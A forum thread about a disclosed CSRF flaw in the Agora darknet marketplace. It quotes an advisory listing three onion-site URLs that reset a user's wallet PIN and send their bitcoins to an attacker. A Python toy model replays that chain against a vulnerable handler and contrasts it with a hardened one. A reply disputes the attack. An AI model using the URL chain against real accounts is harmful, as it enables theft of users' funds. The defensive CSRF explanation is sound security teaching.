Agora CSRF flaw, fairly major. Has it been patched? http://seclists.org/fulldisclosure/2015/Feb/64
I haven't seen a thing about this on the DNM subreddit so here is the breakdown, if anyone can chime in with a "yea this is fixed" that would be awesome.
"Agora Marketplace CSRF to Steal Bitcoins (agorahooawayyfoe.onion)
From: agoraagoraagora () hushmail com
Date: Wed, 18 Feb 2015 06:11:36 +0000
Ladies and gentlemen, boys and girls. It has come to our attention that a brave warrior for the people, Ross William Ulbricht, was unlawfully convicted by the corporation known as the American government.
This mockery of justice has not gone unnoticed.
In order to protect the next generation of darknet markets we will be disclosing vulnerabilities for these sites in order to make these sites safer from attack.
To start, the Agora Marketplace contains a CSRF vulnerability which can be used to drain a victim account of all of their Bitcoins. The following URLs can be used to perform this attack:
URL to start PIN reset: http://agorahooawayyfoe.onion/startresetpin?action=askresetpinaction&controller=user&confirmed=true&confirm-submit=
URL to change current PIN: http://agorahooawayyfoe.onion/resetpin?pin1=1337&pin2=1337&submit=Save
URL to send bitcoins using the new pin: http://agorahooawayyfoe.onion/sendbitcoins?targetaddress=[YOUR_BTC_ADDY]&withdrawschedule=0&targetamount=1&walletpin=1337&submit=Send
These are all GET requests and don't require JavaScript to work. NoScript cannot save you from poor coding practices.
There will be more to come. Stay safe. Stay anonymous.
-The Guardians of Peace "
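To make the mechanism in that advisory concrete, here is an added example (my own toy model, not code from the post, the advisory, or Agora). It models the three-step chain as state-changing GET endpoints whose only check is the session cookie, replays it the way three `<img src>` tags on an attacker's page would (plain GETs with the victim's cookie attached, no JavaScript), and puts a hardened handler next to it. The paths and parameter names are taken from the advisory; the in-memory "server", `SITE`, the attacker origin and the account data are assumptions made for illustration.

```python
# Added example, not code from the post or from Agora: a toy model of the
# flaw described above (state-changing GET endpoints whose only check is the
# session cookie) beside one hardened form of the same endpoints. The paths
# and parameter names come from the advisory; the in-memory "server", SITE,
# the attacker origin and the account data are assumptions.
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

SITE = "http://market.example"        # assumed marketplace origin
SECRET = secrets.token_bytes(32)      # server-side key for CSRF tokens

# assumed state: one logged-in victim with a wallet PIN and a balance
SESSIONS = {"sess-victim": {"user": "victim"}}
ACCOUNTS = {"victim": {"pin": "4242", "btc": 1.0, "reset_pending": False}}
VICTIM_COOKIE = {"session": "sess-victim"}


def csrf_token(session_id):
    """Synchronizer token bound to the session via HMAC, so nothing is stored."""
    return hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def _apply(user, path, params):
    """Business logic shared by both handlers: the three-step chain from the post."""
    acct = ACCOUNTS[user]
    if path == "/startresetpin":
        acct["reset_pending"] = True
        return 200, "pin reset started"
    if path == "/resetpin":
        if not acct["reset_pending"] or params["pin1"] != params["pin2"]:
            return 400, "no reset in progress or pins differ"
        acct["pin"], acct["reset_pending"] = params["pin1"], False
        return 200, "pin changed"
    if path == "/sendbitcoins":
        if not hmac.compare_digest(params["walletpin"], acct["pin"]):
            return 403, "bad pin"
        amount = float(params["targetamount"])
        if amount > acct["btc"]:
            return 400, "insufficient funds"
        acct["btc"] -= amount
        return 200, f"sent {amount} BTC to {params['targetaddress']}"
    return 404, "no such action"


def vulnerable_handler(method, url, cookies, headers=None, body=None):
    """The disclosed design: any method, parameters in the query string,
    and the session cookie as the only check."""
    user = SESSIONS.get(cookies.get("session"), {}).get("user")
    if user is None:
        return 401, "login required"
    parts = urlsplit(url)
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return _apply(user, parts.path, params)


def hardened_handler(method, url, cookies, headers=None, body=None):
    """POST only, the request source must be this site, and the body must
    carry the session's CSRF token. Any one of the three defeats the <img> trick."""
    headers, body = headers or {}, body or {}
    sid = cookies.get("session")
    user = SESSIONS.get(sid, {}).get("user")
    if user is None:
        return 401, "login required"
    if method != "POST":
        return 405, "state changes require POST"
    # an <img> GET carries only Referer; a cross-site <form> POST carries Origin
    source = headers.get("Origin") or headers.get("Referer", "")
    if urlsplit(source).netloc != urlsplit(SITE).netloc:
        return 403, "cross-site request rejected"
    if not hmac.compare_digest(body.get("csrf", ""), csrf_token(sid)):
        return 403, "missing or wrong csrf token"
    return _apply(user, urlsplit(url).path, body)


DRAIN_CHAIN = (  # the three URLs from the advisory, in order
    "/startresetpin?action=askresetpinaction&controller=user&confirmed=true",
    "/resetpin?pin1=1337&pin2=1337",
    "/sendbitcoins?targetaddress=ATTACKER&withdrawschedule=0&targetamount=1&walletpin=1337",
)


def reset_victim():
    ACCOUNTS["victim"].update(pin="4242", btc=1.0, reset_pending=False)


def run_drain(handler):
    """Replay the chain as three <img src> tags on an attacker page would:
    plain GETs, victim's cookie attached, no JavaScript. Returns the status
    codes and the balance left afterwards."""
    reset_victim()
    attacker = {"Referer": "http://attacker.example/"}
    statuses = [handler("GET", SITE + path, VICTIM_COOKIE, attacker)[0]
                for path in DRAIN_CHAIN]
    return statuses, ACCOUNTS["victim"]["btc"]


def cross_site_form_post():
    """A forged auto-submitting form: it is a POST, but Origin is the attacker's."""
    reset_victim()
    body = {"targetaddress": "ATTACKER", "targetamount": "1", "walletpin": "4242"}
    return hardened_handler("POST", SITE + "/sendbitcoins", VICTIM_COOKIE,
                            {"Origin": "http://attacker.example"}, body)[0]


def legitimate_withdraw():
    """The real page: same-origin POST carrying the token the server minted."""
    reset_victim()
    body = {"targetaddress": "MINE", "targetamount": "0.5", "walletpin": "4242",
            "csrf": csrf_token("sess-victim")}
    status = hardened_handler("POST", SITE + "/sendbitcoins", VICTIM_COOKIE,
                              {"Origin": SITE}, body)[0]
    return status, ACCOUNTS["victim"]["btc"]


if __name__ == "__main__":
    print("vulnerable:", run_drain(vulnerable_handler))   # ([200, 200, 200], 0.0)
    print("hardened:  ", run_drain(hardened_handler))     # ([405, 405, 405], 1.0)
    print("forged POST:", cross_site_form_post())          # 403
    print("legit POST:", legitimate_withdraw())            # (200, 0.5)
```

The point the advisory makes about NoScript holds in this model: the drain needs nothing but the victim's browser fetching three URLs with its cookie attached, which an `<img>` does on its own. The hardened handler layers three independent checks (method, source header, token), so a single bypass of one of them is not enough; a `SameSite` attribute on the session cookie would be a fourth, browser-side layer, left out here only because the toy model has no real cookie jar.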
This is bollocks.
Agora is now a bitcoinless marketplace. All the wallet trouble was the changeover.
Bitcoin gets left at the door, and tumbled while you are handed casino chips to spend in the marketplace.
When the vendor withdraws funds, the casino chips are replaced with bitcoin sent from the tumbler outside the door. Inside, the escrows, commission, postage, finalizing, refunds - are all just maths. Nothing occurs on the blockchain. It's a fly-by-wire marketplace without bitcoin or wallets. 4% less is sent to vendors than is deposited by buyers - their commission.
Remember how deposits weren't being credited to you on the market, but all the internal trading continued to work when the tumbler and wallets weren't working? The big roundabout tumbler wheel outside the casino wasn't attached. It was just freewheeling.
Agora will get this kind of ill-thought blackmail or scam attempt every day of the week. Nobody can "hack" their "escrow wallet". There isn't one.